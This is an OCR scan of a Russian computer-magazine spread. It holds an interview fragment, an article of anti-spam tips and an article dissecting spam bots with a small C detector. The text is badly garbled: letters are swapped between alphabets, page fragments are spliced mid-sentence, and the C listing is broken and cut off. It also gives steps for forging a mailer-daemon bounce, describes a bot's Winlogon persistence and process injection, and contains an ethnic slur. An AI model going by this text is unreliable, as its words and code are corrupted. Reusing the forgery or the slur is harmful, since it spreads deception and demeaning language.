МИХАИЛ ФЛЕНОВ: Смертная казнь. 


ЗАРАЗА: Если на ближайшее будущее, то пока возможен небольшой рост. Если на долгосрочный период, 
то, скорее всего, мы придем к тому, что электронная почта отомрет и основное общение, а вместе с ним 
и спам, перейдет в службы мгновенных сообщений. 
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be macho! 


6 правил непопадания в спамерские базы 


ПОЛЬЗОВАТЕЛИ, ПОГРЕБЕННЫЕ ПОД ТОННАМИ РЕКЛАМНОЙ МАКУЛАТУРЫ, НЕ ПОНИМАЮТ, 
КАКИМ ЖЕ ОБРАЗОМ СТЕРВЯТНИКАМ УДАЛОСЬ ДОБЫТЬ ИХ АДРЕС НА ЭТОТ РАЗ. 
ВЕДЬ, КАЗАЛОСЬ БЫ, БЫЛИ ПРЕДПРИНЯТЫ ВСЕ МЕРЫ ПРЕДОСТОРОЖНОСТИ! 


Методики сбора мейл-адресов довольно продвину- 
ты и одним лишь блужданием по паутине совсем не 
ограничиваются. Покажем, как максимально обезо- 
пасить себя от нежелательной корреспонденции. 

Чтобы не получать спама, достаточно «всего 
лишь» не попасть в спамерские базы, прошмыгнув 
мимо них, словно старая крыса Шушара из сказки 
про Рики-Тики-Тави. Но прошмыгнуть не так-то 
просто. Спамеры — это не голые негры (простите, 
афро-африканцы), бегающие по пустыне с луками 
и копьями в поисках жратвы. Спамеры — это техни- 
чески продвинутые и невероятно циничные хакеры, 
оснащенные самым современным оружием, соз- 
данным не только для массовой рассылки, но и для 
автоматизированного поиска тай-адресов. В этой 
отрасли крутятся большие деньги, и бороться 
со спамерами голыми руками — все равно что па- 
дать грудью на амбразуру. Лучше незаметно раст- 
вориться во тьме, заныкав свой тай-адрес как мож- 
но глубже. 

Существует ряд довольно простых правил, 
следование которым сокращает вероятность спа- 
мерской атаки на 90%! Причем все они не требуют 
никаких дополнительных усилий или телодвиже- 
ний. Почти никаких... 
> правило 1: испытание сервера на прочность. 
Прежде чем выбрать mail-cepBep для постоянной 
деловой переписки, необходимо удостовериться, 
что он надежно защищает адреса своих клиентов от 
чужих загребущих лап, но в то же время не сильно 
усердствует в борьбе с нежелательной (с его точки 
зрения) рассылкой и не включает спаморезку 
на полную мощь. 

Для этого зарегистрируйся на подопытном 
сервере и периодически (в течение одной-двух не- 
дель) отправляй письма на свои же адреса, зареги- 
стрированные на других серверах, чтобы имитиро- 
вать сетевую активность (спамерам «мертвые» 
ящики не интересны). Если за все это время не при- 
дет ни одного «левого» письма, сервер можно счи- 
тать более или менее надежным. Но, прежде чем 
начать им пользоваться, необходимо зарегистриро- 
ваться на hotmail'e, yahoo и других бесплатных за- 
рубежных серверах и попытаться отправить себе 
письмо оттуда. Довольно часто письма не проходят, 
попадая под нож спаморезки, в результате чего те- 
ряется возможность переписки с большим количе- 
ством респондентов. 
> правило 2: легкая добыча — короткие и сло- 
варные имена. Каждый вменяемый пользователь 


“"«. 


хочет иметь короткое и легко запоминающееся 
имя, которое можно передать друзьям по sms, запи- 
сать в блокнот, напечатать на визитке — что-нибудь 
в стиле п2К @ тай.ги. К сожалению, подобные име- 
на (при всей их внешней привлекательности) стано- 
вятся легкой добычей спамеров, поскольку элемен- 
тарно вскрываются методом лобового перебора. 
Спам валит мегатоннами, и ничего другого не оста- 
ется, как идти сдаваться на мясокомбинат. То же 
самое относится и к словарным именам типа 
SuperHero @ yandex.ru или anton @zmail.ru. Добавле- 
ние цифр, указывающих Ha год рождения, напри- 
мер, luba_76@rambler.ru, положение не спасает, 
поскольку существует не так уж много возможных 
вариантов. 

Чем длиннее имя, тем лучше. Но и перебар- 
щивать тоже не следует. Восьми символов в боль- 
шинстве случаев оказывается вполне достаточно, 
и такие адреса уже не могут быть найдены методом 
перебора за разумное время, во всяком случае, 
спамеры подобными атаками не занимаются. 
> правило 3: мой друг — враг мой. Крайне неже- 
лательно давать свой адрес людям, пренебрегаю- 
щим установкой свежих заплаток и запускающим 
все вложения, которые приходят им по Сети. Стоит 
только вступить с ними в переписку, и уже через ко- 
роткое время можно обнаружить, что поток спама 
возрос на порядок, причем не двоичный, а десятич- 
ный или даже... шестнадцатеричный! 

Все очень просто. Это раньше червей и виру- 
сов писали из «любви» к человечеству или от нече- 
го делать. Сейчас черви активно используются спа- 
мерами и являются идеальным средством сбора 
мейл-адресов. Проникнув на машину, червь первым 
делом лезет в адресную книгу Outlook Express или 
The Вай, атак же сканирует почтовую базу на пред- 
мет наличия адресов отправителей и получателей. 
После чего передает накопленную информацию 
своему владельцу. Существует мнение, что в насто- 
ящее время данный механизм является основным 
способом добычи мейл-адресов — порядка 60%-70% 
спамеры добывают именно так! Мир тесен, и через 
знакомых своих знакомых можно выйти на кого 
угодно. Математики говорят, что в среднем для это- 
го достаточно построить цепочку длиной в шесть- 
десять человек. И достаточно дорваться до одной 
единственной почтовой базы... 

Для переписок с малознакомыми девушками 
и друзьями можно (и нужно) завести отдельный 
ящик, еще один ящик — для регистрации на всяких 
форумах или в виртуальных магазинах. Благо сов- 
ременные почтовые клиенты позволяют работать 
с любым количеством ящиков, обеспечивая при 
этом надлежащий уровень комфорта. Но проблема 
в том, что любое количество ящиков не решает ос- 
новной проблемы — главный источник угрозы ис- 
ходит от корпоративных респондентов, тех самых, 
которые (по идее) должны быть железобетонно за- 
щищены. Увы! Сплошь и рядом администраторы 
вспоминают о заплатках только тогда, когда черви 
вовсю гуляют по Сети, и что еще хуже — торгуют 


почтовыми адресами без всякого стеснения... 

Можно прибегнуть к такой тактике. Сначала 
начинаешь переписку с компанией (даже очень 
крупной, значительной и именитой) со специально 
созданного ящика. И если в течение месяца-двух 
на него не начинает сыпаться спам, «рассекречива- 
ешь» свой основной адрес. Конечно, в первую оче- 
редь все эти игры в «секретность» неудобны тебе 
самому. Приходится держать кучу ящиков и посто- 
янно помнить, кому и какой адрес ты дал. Но зато 
основной ящик, автоматически проверяемый каж- 
дые 5 минут, в 99% содержит только полезную кор- 
респонденцию, на которую можно отреагировать 
немедленно. 
> правило 4: не оставляй адреса в сети. Сеть, 
изначально созданная для общения, со временем 
превратилась в лабиринт, опутанный колючей про- 
волокой. Если никто и нигде не будет оставлять сво- 
их адресов, то, соответственно, никто и никому не 
станет писать. А ведь созерцать лаконичную над- 
NUCb «новых сообщений нет» никому не хочется! Ду- 
ша просит свободы. Душа хочет завести друзей во 
всех концах света, просто красивых девушек азиа- 
тской внешности и бесшабашных французских пар- 
ней, что могут пригласить загадочного русского 
из заснеженной страны Сибири на концерт люби- 
мой группы только потому, что вы оба — фэны, 
а фэнам всегда есть, о чем поговорить. 

Наконец, программист (астроном/линг- 
BUCT/...), какой бы он ни был крутой специалист, на- 
ходясь в изоляции, всегда загнивает. Общение 
с коллегами — это словно свежего воздуха глоток. 
Без обмена идеями, без диспутов и споров (иногда 
переходящих в священные войны) мы бы никогда 
не стали теми, кто мы есть сейчас. Кто-то может ре- 
зонно возразить: общаться-то можно и на форумах, 
не оставляя никаких адресов (ну, разве что для ре- 
гистрации). Обломайтесь, мужики. На форумах уже 
давно в основном идет треп за жизнь, демонстра- 
ция собственной крутизны и надругательство над 
новичками. Серьезные технические проблемы там 
обсуждаются крайне редко, поскольку зачастую 
они тесно связаны с NDA. И к Tomy же драть свою 
задницу, выполняя чужую домашнюю работу, никто 
просто так не будет. А вот по мылу (по принципу 
«ты — мне, я — тебе») — запросто! 

Так что технические проблемы преимущество 
обсуждаются по мылу, через списки рассылки или 
персонально. Если со списками рассылки все по- 
нятно (достаточно присоединиться к интересному 
проекту), то с мылом не все так просто. Чтобы тебе 
могли писать, нужно оставить адрес на форумах, 
блогах, собственных сайтах и куче других тусовоч- 
ных мест. Ведь фокус в том, как их оставлять. За- 


Изначально $РАМ‘'ом назывались мясные консервы, 
агрессивно продвигаемые на рынок путем 
забрасывания почтовых ящиков (не электронных) 
горами рекламной макулатуры 


пись вида Крпс @ зепатай.ги любой харвестр схава- 
ет сразу, после чего спам хлынет мощным потоком 
как из прорвавшей канализационной трубы. Кое-то 
пытается хитрить: Крпс at тай dot ru. Та же самая за- 
пись, только по-английски — символ « @ », прозван- 
ный в народе «собакой», в действительности чита- 
ется как «коммерческое АТ». Следовательно, в рус- 
ской нотации этот же адрес выглядит так: Крпс гав- 
гав mail точка ru :). 

Ставка делается на то, что человек (с IQ, от- 
личным OT единицы) обязательно это поймет, а ме- 
ханический харвестр обломается. На самом деле 
все происходит с точностью до наоборот. Как 
на счет записи: jose.palanco perro eazel punto es? 
Так что подобные извращения катят только среди 
своих, а иноземные граждане при попытке дешиф- 
ровки «каракулей» даже не догадываются, что 
за ними скрываются действующий почтовый адрес, 
на который предполагается что-то написать. Креа- 
тив в стиле kpnc_nospam_at_mail_ru из той же опе- 
ры. 

Харвестры ведь возникают не сами по себе. 
Их люди пишут, и эти люди отнюдь не дураки. Ис |Q 
уних все в порядке. Очень часто используется сле- 
дующий алгоритм. Харвестр находит доменное имя 
популярного сервера (например, тай или уапаех), 
после чего трактует все, что слева от него, как по- 
тенциальное имя клиента. В частности, pedrilo perro 
yahoo punto сот превращается в регго @ yahoo.com 
и pedrilo@ yahoo.com. После чего по обоим адресам 
производится пробная рассылка писем. Адреса 
«perro@yahoo.com» скорее всего не существует 
(так как «perro» и есть « @ », только по-испански), 
а вот pedrilo@ уапоо.сот сразу палится. 

Некоторые до сих пор по своей наивности счи- 
тают, что харвестры в основном ищут адреса 
по символу @, вот и заменяют его всем, чем ни по- 
падя, в том числе и графическим изображением. 
Но харвестрам это не помеха, поскольку сим- 
Bon «@» уже давно не единственный и совсем 
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ггается mail- (1) 


Return-path: <> 


Received: from mail by mx27.mail.ru with local 

id 1GkNOB-000N85-00 

for slut96@inbox.ru; Wed, 15 Nov 2006 18:48:39 +0300 
X-Failed-Recipients: putaaaaaaaaa@fastmail.jp 
From: Mail Delivery System <Mailer-Daemon@mx27.mail.ru> 
To: slut96@inbox.ru 
Subject: Mail delivery failed: returning message to sender 
Message-Id: <E1GkNOB-000N85-00@mx27.mail.ru> 
Date: Wed, 15 Nov 2006 18:48:39 +0300 


This message was created automatically by mail delivery software. 


A message that you sent could not be delivered to one or more of its 
recipients. This is a permanent error. The following address(es) failed: 
putaaaaaaaaa@fastmail.jp 

SMTP error from remote mailer after RCPT TO:<putaaaaaaaaa@fastmail.jp>: 

host inl.smtp.messagingengine.com [66.111.4.72]: 

550 <putaaaaaaaaa@fastmail.jp>: Recipient address rejected: 

User unknown in local recipient table 


Return-path: <slut96@inbox.ru> 
Received: from [83.239.33.46] 
by mx27.mail.ru with asmtp 

id 1GkMz1-000LkA-00 

for putaaaaaaaaa@fastmail.jp; Wed, 
Date: Wed, 15 Nov 2006 18:50:30 +0300 
From: mmx <slut96@inbox.ru> 
X-Mailer: The Bat! (v3.62.12) 
Reply-To: mmx <slut96@inbox.ru> 
X-Priority: 3 (Normal) 
essage-ID: <374497972.20061115185030@inbox. ru> 
To: putaaaaaaaaa@fastmail.jp 
Subject: test 
IME-Version: 1.0 
Content-Type: text/plain; charset=us-ascii 
Content-Transfer-Encoding: 7bit 


(port=40466 helo=[83.239.33.46]) 


15 Nov 2006 18:47:28 +0300 


Professional 


hello, putaaaaaaaaa! 


mmx mailto:slut96@inbox.ru 


не характерный признак электронного адреса. 
Главный критерий — это доменные имена самих 
почтовых серверов, которые хорошо известны и ко- 
торые так просто не спрячешь. 

Единственное, что можно предпринять — за- 
писать свой адрес целиком в графической виде 
и прикрепить на форум в виде изображения. Если 
только не называть его ту-етай, то харвестр обло- 
мается ОСВ‘'ить все графические изображения. Хо- 
тя... Как показывает статистика, такие изображе- 
ния имеют довольно характерные пропорции и раз- 
меры, поэтому для облома харвестров изображе- 
ние должно быть большим (например, портрет 
в профиль ниже пояса) с надписью е-мейла на яго- 
дицах :). Против ягодиц бессильны даже самые 
продвинутые харвестры. Правда, при этом возника- 
ет другая проблема — чтобы отправить сообщение, 
респондент должен вручную переписать его. Сле- 
довательно, мыло должно быть коротким и незатей- 
ливым. А желательно даже словарным, но это про- 
тиворечит второму правилу, и ты оказываешься 
в позе буриданового осла, короче, в полной прост- 
рации. А если учесть, что не все форумы допускают 
присоединение графических изображений, стано- 
вится совсем хреново. 

Пожалуй, единственный разумный выход — 
заменить етай ссылкой на страницу, где он лежит. 
Заводишь себе бесплатный хостинг, размещаешь 
там изображение своего мыла в графическом виде, 
а на форумах даешь URL на эту страницу. И все! 
Вместо графического изображения можно еще раз- 
местить Чама-скрипт, содержащий зашифрованный 
email и расшифровывающий его (с выводом на экран 
в виде гиперссылки) только при нажатии на кнопку 
или иконку. Среди всех харвестров с подобными за- 
щитами еще не справляется ни один. А твоим рес- 
пондентам достаточно совершить два клика мышью 
и не нужно дешифровывать никаких каракулей. 

Чтобы не писать систему шифрования вруч- 
ную, можно воспользоваться одной из готовых 
программ, специально написанных для этих целей. 
Например, HTML Protector (antssoft.fileburst.com/html- 
protector.zip), HTML Power (www.pullsoft.com/html- 
power.zip) или Encrypt HTML Pro (www.mtopsoft.com/- 
download/enchp.zip). 
> правило 5: сбивай спамеров ракетой класса 
mailer-daemon. Что же делать, если спамерское 
письмо все-таки пришло? Материться (первым де- 
лом) — это понятно. А по существу?! Некоторые 
письма содержат адрес, написав на который, мож- 
но якобы отказаться от дальнейшей рассылки. 
Но делать этого ни в коем случае не следует, иначе 
спамер поймет, что адрес «живой», и письма пова- 
лятся с новой силой! 

Если есть желание рискнуть, можно попробо- 
вать накрыть спамера баллистической ракетой ти- 
па mailer-daemon. В смысле, послать поддельное 
письмо от имени сервера, что данный адрес не су- 
ществует. Достаточно часто (хотя и не всегда) спа- 
меры отслеживают такие «ракеты» и вычеркивают 
недействительные адреса из своих баз, чтобы 


He распылять трафик впустую. Весь вопрос в том, 
как подделать такое письмо? 

Нам понадобится The Bat! или telnet (работа 
с telnetiom подробно описана в «Технике сетевых 
атак», которую можно бесплатно скачать с ftp://nezu- 
mi.org.ru). Для начала понадобится образец «ругатель- 
ства» тай-Чаетоп'а, который можно получить, отпра- 
вив письмо на заведомо несуществующий адрес, нап- 
ример, Ha putaaaaa @fastmail.jp. Тогда через некоторое 
время придет ответ, который мы и возьмем за основу. 

Перетаскиваешь этот текст через буфер обме- 
на и вставляешь в новое письмо, запустив прямой 
наводкой в сторону спамера. Возращенные письма 
анализирует не человек, а автомат. И анализирует 
он их следующим образом. Нажми <F9> (в меню — 
source), чтобы увидеть исходное содержимое пись- 
Ma, возращенного тайег-Чаетоп'ом со всеми слу- 
жебными заголовками и сосредоточенно вкурива- 
ешь (смотри листинг). 

Ответ mailer-daemon'a состоит из служебных 
заголовков письма самого daemon'a и текстом ру- 
гательства с приложенной копией исходного пись- 
ма. Собственно говоря, различные тайег-даетоп'ы 
отвечают слегка по-разному, и, чтобы робот смог ску- 
рить их ответ, он должен обращать внимание на оп- 
ределенные поля, описанные в ВЕС-1891 (ftp://ftp.rfc- 
editor.org/in-notes/rfc1891 txt). Да только кто же ВЕС чи- 
тает? Вот программисты и действуют наугад, прове- 
ряя поле «subj» на предмет строки «Май delivery 
failed: returning message to sender». Это не един- 
ственно возможный вариант ответа Чаетоп'а, но, 
пожалуй, самый частый, а «Subj» легко «подделывает- 
ся» влюбом почтовом клиенте. Другие смотрят на нес- 
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Ругательство тай-даетоп'а на попытку отправить письмо несуществующему адресату 


тандартное поле «X-Failed-Recipients: putaaaaa @ fast- 
mail.jp», присутствие которого расценивается как 
трындец. Подделать это поле на порядок сложнее. 
На помощь приходит The Bat!. Нажимаешь 
<CTRL-N> и в меню «View» смотришь пункт «Edit 
Headers», открывающий огромное окно с кучей наст- 
роек, из которых нужно только «Message Hea- 
ders» (сообщения заголовков). Нажимаешь кнопку 
«ADD» и в none «Display this header field as» (отобра- 
жать данное поле заголовка как) вводишь строку «X- 
Failed-Recipients:» (со знаком двоеточия на конце), 
а в поле «RFC Name (as it used in the RFC 822 head- 
er)» пишешь «X Failed Recipients» (уже без двоето- 
чия). Взводишь галочку напротив «Allow to edit this 
field in the Message Editor» и дважды жмешь Ha «ОК». 
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Расширение функциональных возможностей The Вага путем добавления поля X-Failed-Recipients 


в заголовок письма 


Теперь в меню «View» появляется пункт «Х- 
Failed-Recipients:», поставив галочку напротив которо- 
го, получаешь возможность редактировать его содер- 
жимое по своему усмотрению (там должен быть твой 
обратный адрес, вводящий спамера в заблуждение). 

Сам текст послания подделать нетрудно — 
достаточно скопировать его из листинга, не забыв 
заменить адрес putaaaaa @ fastmail.jp на адрес сво- 
его почтового ящика. Затем необходимо приложить 
заголовок оригинального спамерского письма (в ко- 
тором содержится его ID, помогающий роботу опре- 
делить, что именно отправлялось). Тело письма мо- 
жет отсутствовать, но лучше для перестраховки 
присоединить и его. 
> правило 6: не сопротивляйся неизбежному. 
Как бы ты не извращался, попадание в спамерские 
базы неизбежно (особенно при интенсивной пере- 
писке). Это всего лишь вопрос времени, с течением 
которого поток нежелательной корреспонденции 
возрастает. Наконец наступает момент, когда объем 
спама в несколько раз превышает полезную пере- 
писку, буквально теряющуюся на его фоне. Вариан- 
тов здесь два: либо продолжать терпеть это безобра- 
зие (ожесточая систему фильтрации, пока она сов- 
сем не одичает и не будет пожирать со спамом все 
подряд), либо сменить ящик, предварительно уведо- 
мив об этом каждого из своих респондентов. Но сто- 
ит только пойти по пути смены адреса, как куча лю- 
дей не сможет тебя найти. И если для домашней пе- 
реписки это вполне терпимо (раз не нашли — значит, 
не особо хотели), то в корпоративно-деловой среде 
одно-единственное неполученное письмо может сто- 
ить не только упущенной выгоды, но и карьеры. 

Отсюда следует неутешительный вывод: 
электронная почта это, конечно, хорошо, дешево 
и удобно, но лучше вместе с мейлом давать и номер 
телефона, который меняется гораздо реже © 


http://antssoft.fileburst.com/htmlprotector.zip 
HTML Protector 


www. pullsoft.com/htmlpower.zip 
HTML Power 


www.mtopsoft.com/download/enchp.zip 
Encrypt HTML Pro 
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Спам-боты: вскрытие и борьба 


ЗЛОБНЫЕ ПРОГРАММИСТЫ НЕ СПЯТ НОЧАМИ И НЕ ОТДЫХАЮТ ДНЯМИ, ПЫТАЯСЬ 
ЗАСАДИТЬ ОЧЕРЕДНОГО СПАМ-БОТА В КОМПЬЮТЕР ЧЕСТНОГО ПОЛЬЗОВАТЕЛЯ. 
ОНИ ЗАРАБАТЫВАЮТ ДЕНЬГИ НА НАШЕМ ТРАФИКЕ, ЗАСВЕЧИВАЯ НАС В БЛЭКЛИСТАХ 
И ВЫСТАВЛЯЯ В ДУРНОМ СВЕТЕ ПЕРЕД НАЧАЛЬСТВОМ. В ЭТОЙ СТАТЬЕ 

МЫ ВЗГЛЯНЕМ НА СПАМ-БОТЫ С ПОЗИЦИИ ЗАЩИТНИКА ДОБРА 

И СПРАВЕДЛИВОСТИ, ПРОВЕДЕМ ВСКРЫТИЕ И НАУЧИМСЯ ИХ УБИВАТЬ 


Олег Зайцев (Z-oleg.com 


> капля истории. Исторически методики рас- 
сылки спама пережили три базовых этапа: 


1 РАССЫЛКА ВРУЧНУЮ. ЭТОТ МЕТОД 
ДО СИХ ПОР ПРИМЕНЯТСЯ, 

НО ЭФФЕКТИВНОСТЬ ЕГО НЕВЕЛИКА, 

И С ТАКИМ СПАМОМ ОЧЕНЬ ПРОСТО 
БОРОТЬСЯ ПУТЕМ ВНЕСЕНИЯ 
ПОЧТОВОГО И [Р-АДРЕСА ОТПРАВИТЕЛЯ 
СПАМА В ЧЕРНЫЙ СПИСОК. 


2 ПРОГРАММЫ АВТОМАТИЧЕСКОЙ 
РАССЫЛКИ СПАМА. МОГУТ БЫТЬ 
ВЫПОЛНЕНЫ В ВИДЕ УТИЛИТЫ 

ПОД WINDOWS ИЛИ СКРИПТА 

ДЛЯ РАЗМЕЩЕНИЯ НА М/ЕВ-САЙТЕ. 

В СУЩНОСТИ, ЭТО АВТОМАТИЗИРО- 
ВАННАЯ РАЗНОВИДНОСТЬ МЕТОДА 1, 

И ИНОГДА ОНА РАБОТАЕТ ПО ПРИНЦИПУ 
ЛОХОТРОНА — ПОЛЬЗОВАТЕЛЮ 
ОБЕЩАЮТСЯ ЗОЛОТЫЕ ГОРЫ, ЕСЛИ ОН 
ПРИМЕТ УЧАСТИЕ В РАССЫЛКЕ СПАМА 
ПРИ ПОМОЩИ УКАЗАННОЙ ПРОГРАММЫ. 
ДОВЕРЧИВЫЕ ПОЛЬЗОВАТЕЛИ ЛОВЯТСЯ 
НА ЭТО, ПРИНИМАЮТ УЧАСТИЕ — 

В РЕЗУЛЬТАТЕ ОНИ И ДЕНЕГ 

НЕ ПОЛУЧАТ, И ИХ IP ПОПАДЕТ 

В ЧЕРНЫЕ СПИСКИ. 


3 РАССЫЛКА СПАМА ПРИ ПОМОЩИ СЕТИ 
ТРОЯНСКИХ ПРОКСИ И СПАМ-БОТОВ. 
ЭТОТ МЕТОД НАИБОЛЕЕ ПОПУЛЯРЕН 

И АКТУАЛЕН В НАСТОЯЩЕЕ ВРЕМЯ 

И ПОЭТОМУ ЗАСЛУЖИВАЕТ 
ДЕТАЛЬНОГО РАССМОТРЕНИЯ. 


Схема работы типового спам-бота наглядно пока- 
зана на рисунке 1. 

Во-первых, для построения сети троянских 
прокси или ботов необходимо каким-либо образом 
заразить множество компьютеров этим самым 60- 


том. Достигнуть этого можно при помощи эксплой- 
тов, Trojan-Downloader, почтовых или сетевых чер- 
вей. Наиболее простая схема — это Trojan- 
Downloader, который после запуска доверчивым 
пользователем затаскивает на пораженный 
компьютер все остальные компоненты. 

Далее, после установки и запуска, спам-бот 
связывается с сервером владельцев. Несложно до- 
гадаться, что для работы ему необходим список 
e-mail адресов, по которым следует рассылать 
спам, параметры рассылки и шаблоны самих пи- 
сем. Чаще всего получение этой информации ве- 
дется по многоступенчатой схеме — на первом эта- 
пе спам-бот посылает своим хозяевам информацию 
о TOM, что он запущен (с указанием IP-agpeca пора- 
женной машины, ее характеристиками и неким уни- 
кальным идентификатором — шаг 1 на схеме), в от- 
вет получает конфигурацию (шаг 2), содержащую, 


в частности, URL серверов, с которых ему следует 
загружать списки адресов и шаблоны спама. Далее 
спам-бот загружает базу адресов (шаг 3) и шабло- 
ны (шаг 4), после чего приступает к рассылке. Важ- 
ной особенностью является то, что спам-бот вмес- 
то тупой рассылки заданной текстовки по списку 
адресов может модифицировать текст, дополнять 
его картинками или представлять в виде графики 
в соответствии с заданным алгоритмом и шабло- 
ном. После завершения рассылки порции писем 
многие спам-боты посылают отчет о проделанной 
работе (шаг 5). Отчет может содержать статисти- 
ческие данные (количество успешных рассылок и 
ошибок) и список адресов, по которым не удалось 
разослать спам. 

Для пользователя появление на компьютере 
спам-бота является крайне неприятным событием. 
Во-первых, он накрутит ему десятки мегабайт тра- 
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Рисунок 1. Схема работы спам-бота 
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Фрагмент обмена с $МТР-сервером 


фика. А во-вторых, IP пораженной машины с высо- 
кой степенью вероятности попадет в черные спис- 
ки, и в дальнейшем возникнут проблемы с отправ- 
кой нормальной почты. Это особенно важно для 
фирм, имеющих свой почтовый сервер и статичес- 
кий |Р-адрес — всего один юзер со спам-ботом мо- 
жет причинить массу головной боли админам. 

Построение сетей из спам-ботов является 
прибыльным бизнесом — объектом торгов может 
быть сам спам-бот, готовая сеть из таких ботов или 
платная рассылка спама, осуществляемая ботами. 
Бороться с рассылаемым при помощи ботов спа- 
MOM намного сложнее — фильтрация по IP He эф- 
фективна, а модификация писем затрудняет отсев 
по контексту при помощи байесовских фильтров 
или сигнатурных анализаторов. 

Помимо спам-ботов существует еще одна ме- 
тодика рассылки спама, основанная на применении 
так называемых троянских прокси (Trojan-Proxy), 
которые позволяют злоумышленнику работать в се- 
ти от имени пораженной машины. Типовой алго- 
ритм работы троянского прокси состоит в открытии 
на прослушивание некоторого ТСР-порта (иногда 
номер порта статический, но чаще произвольный — 
для затруднения обнаружения путем сканирования 
портов), после чего он связывается с владельцами 
и передает им IP и порт. Далее он работает как 
обычный прокси-сервер. Многие троянские прокси 
умеют размножаться по принципу сетевых червей 
или при помощи уязвимостей. 

Важно отметить, что существует множество 
гибридов — например, спам-бот может обладать 
функцией Trojan-Downloader для загрузки своих 
обновлений или установки дополнительных ком- 
понентов. 
> = найти и вскрыть! Рассмотрим реальный при- 
мер — зловреда Trojan.Win32.Spabot.ai. Его уста- 
новка начинается с загрузки из интернета дроппе- 
ра размером около 29 Кб. Запустившись, дроппер 
создает на диске файл C:\WINDOWS\system32\- 
грсс.а! и регистрирует себя в автозапуск в качест- 
ве расширения Winlogon (ключик HKLM\SOFT- 
WARE\Microsoft\Windows NT\CurrentVersion\Win- 
logon\Notify\rpcc). Далее он внедряет троянский 
код в процесс winlogon.exe и запускает его через 
CreateRemoteThread — в результате деятельнос- 
ти троянского кода происходит подгрузка библи- 


отеки грсс.а! (это классическая методика инжек- 
та библиотек в процесс «по Рихтеру»). Работает 
библиотека по описанному выше алгоритму — по- 
лучает задание и начинает методичную рассылку 
спама. В качестве лирического отступления сле- 
дует заметить, что среди троянских прокси и 
спам-ботов метод автозапуска в качестве расши- 
рения Winlogon весьма популярен. Его плюс 
в том, что работа идет из контекста Winlogon.exe, 
отдельного процесса у зловреда нет, а библиоте- 
ку с «системным» именем типа грсс.а! не всякий 
юзер решится удалить. Если еще добавить рут- 
кит-маскировку, восстановление ключей реестра 
и монопольное открытие файла, то получим труд- 
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нообнаружимого и трудноудаляемого зловреда. 

Теперь посмотрим на спам-бота с точки зре- 
ния защиты. Конечно, для борьбы с ними можно по- 
советовать антивирусы, Firewall и проактивную за- 
щиту... Но на самом деле детектировать наличие 
спам-бота очень несложно и без них. Дело втом, что 
даже в случае идеальной руткит-маскировки спам- 
бота выдает рассылка спама — достаточно воору- 
житься сниффером и посмотреть, что твориться 
в сети. Выбор сниффера в данном случае не важен, 
но желательно, чтобы он умел реконструировать 
ТСР-сессии и накапливать статистику. Мне для та- 
ких опытов нравится использовать CommView, 
очень неплох Ethereal. Обнаружив в сети заражен- 
ную спам-ботом машину, мы увидим примерно та- 
кую статистику (на рисунке внизу показан трафик 
сегмента сети из двух компьютеров: на одном сниф- 
фер, на втором — спам-бот). 

Как видно, весь трафик — это SMTP + DNS, 
что очень характерно для спам-бота. Далее можно 
отфильтровать обмен по порту 25 ТСР и посмот- 
реть содержимое пакетов. Протокол SMTP — текс- 
товый, поэтому рассылка спама засвечивается по 
содержимому писем. 

Аналогичным способом, кстати, можно ло- 
вить почтовых червей — разница с точки зрения 
трафика лишь в том, что червь рассылает свои ко- 
пии вместо спама. 
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NetBIOS 0,78 % 
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| Числу пакетов у Настройка... 


Длительность захвата от последнего сброса (чч:мм:сс): 00:00:29 
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Статистика обмена с сетью зараженного спам-ботом ПК за 30 секунд 
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Однако у сниффера есть один большой минус — он 
слишком громоздкий для оперативной проверки 
компьютера и требует инсталляции. Для исследо- 
вания локального компьютера выходом из положе- 
ния является утилита TDIMon (www.sysinternals.com), 
которая поможет не только обнаружить «нездоро- 
вую» сетевую активность, но и вычислить порожда- 
ющее ее приложение. 

Кроме того, не сложно изготовить собствен- 
ный детектор спам-ботов при помощи С на основе 
анализа сетевого трафика. Рассмотрим его исход- 
HUK. 

Принцип действия данного детектора крайне 
прост — в его основе лежит сниффер на базе RAW- 
сокетов. Приведенный выше код инициализирует 
библиотеку WS2_32, затем определяет имя хоста и 
ero IP (в реальной утилите стоит предусмотреть воз- 
можность указания IP через командную строку — 
пригодится для запуска на компьютере с несколь- 
кими сетевыми картами). Далее сетевая карта пе- 
реключается в promiscuous mode для приема всех 
пакетов. Данную фичу тоже можно сделать опцио- 
нальной — тогда появится возможность анализиро- 
вать трафик только того компьютера, на котором 
запущена утилита. Прием и анализ пакетов органи- 
зован в цикле: ожидаем приема очередного пакета 
и анализируем его заголовки. Для каждого приня- 
того пакета мы определяем тип по его заголовку — 
нас интересуют только пакеты TCP/IP v4. Если это 
так, то далее проверяем номер порта — для отлова 
спам-бота нам интересен порт 25, соответствующий 
SMTP-npotokony. При обнаружении таких пакетов 
на экран выводятся |Р-адреса источника и получа- 
теля пакета. Для уменьшения протокола в данном 
исходнике предусмотрен еще один уровень фильт- 
рации — утилита реагирует только на пакеты с ус- 
тановленными флагами SYN + АСК. Если запустить 
такую утилиту на зараженном спам-ботом компью- 
тере (или такой компьютер будет в одном сегменте 
сети с тем, на котором запущена утилита), то за- 
фиксируется бурный обмен по порту 25. 

Подобная утилита, конечно, не панацея, 
но в ряде случаев она может весьма пригодиться 
сисадмину, тем более что программа очень прос- 
тая, и ее не сложно модифицировать для других ви- 
дов оперативного анализа трафика. Если допол- 
нить этот пример статистическим анализатором, то 
несложно построить собственную IDS-cuctemy — 
тут поле деятельности не ограниченно :). Естест- 
венно, что при применении такой утилиты или 
сниффера следует помнить, что невозможно ана- 
лизировать трафик компьютеров в сети, построен- 
ной на базе свитчей — в этом случае анализ тра- 
фика следует вести на маршрутизаторе, отвечаю- 
щем за обмен локальной сети с внешним миром. 
В UNIX-cuctemax для такого мониторинга удобно 
применять tcpdump — он является штатным сред- 
ством, и полученный в результате его работы текс- 
товый протокол несложно проанализировать. 
Простейший пример запуска этого сниффера — 
«tcpdump -I tcp port 25 > smtp.log» © 


и листинг нашего детек 


#include <stdafx.h> 

#include <winsock2.h> 

#include <mstcpip.h> 

// Буфер для приема данных 

#define MAX_PACKET_STZE 65535 

static BYTE Buffer [MAX_PACKET_SIZE]; 

int _tmain(int argc, _TCHAR* argv[]) 

{ 
WSADATA wsadata; 
SOCKET RawSocket ; 
int res = 0; 

WSAStartup (MAKEWORD (2,2), &wsadata); 
RawSocket = socket ( AF_INET, SOCK_RAW, 

// Определение имени хоста для нашего ПК 
char HostName[256] ="localhost"; 
gethostname (HostName, sizeof (HostName) ) ; 
printf ("HostName = %s \n", HostName) ; 
PHOSTENT 
pLocalHostEnt = gethostbyname (HostName) ; 


// Инициализация WinSock 

